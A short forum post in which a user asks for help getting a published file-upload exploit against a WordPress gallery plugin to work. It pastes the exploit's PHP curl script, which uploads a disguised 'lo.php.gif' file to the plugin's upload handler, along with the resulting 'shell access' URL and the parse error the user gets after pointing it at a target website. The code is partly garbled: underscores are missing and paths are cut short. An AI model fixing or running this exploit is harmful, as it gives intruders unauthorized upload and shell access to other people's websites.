Forum Thread: Can Someone Please Give Me Assistance with This Exploit?

Can someone help me understand this exploit? From the exploit I assumed I was supposed to make two files using the code provided. One named PostShell.php and one named lo.php.gif. I've done that and changed the curl_init value to the url of the website. I ran php PostShell.php but get the following error:

PHP Parse error: syntax error, unexpected '"http://www.targetwebsite.com/w' (TCONSTANTENCAPSED_STRING) in /root/postshell.php on line 5

Thanks for those who can help!

#?#?This? is the exploit on exploit-db
https://www.exploit-db.com/exploits/18998/

##This is the code of the exploit
Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/…/plug…/gallery-plugin/upload/php.php");
curlsetopt($ch, CURLOPTPOST, true);
curlsetopt($ch, CURLOPTPOSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curlsetopt($ch, CURLOPTRETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/…/gallery-pl…/upload/files/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active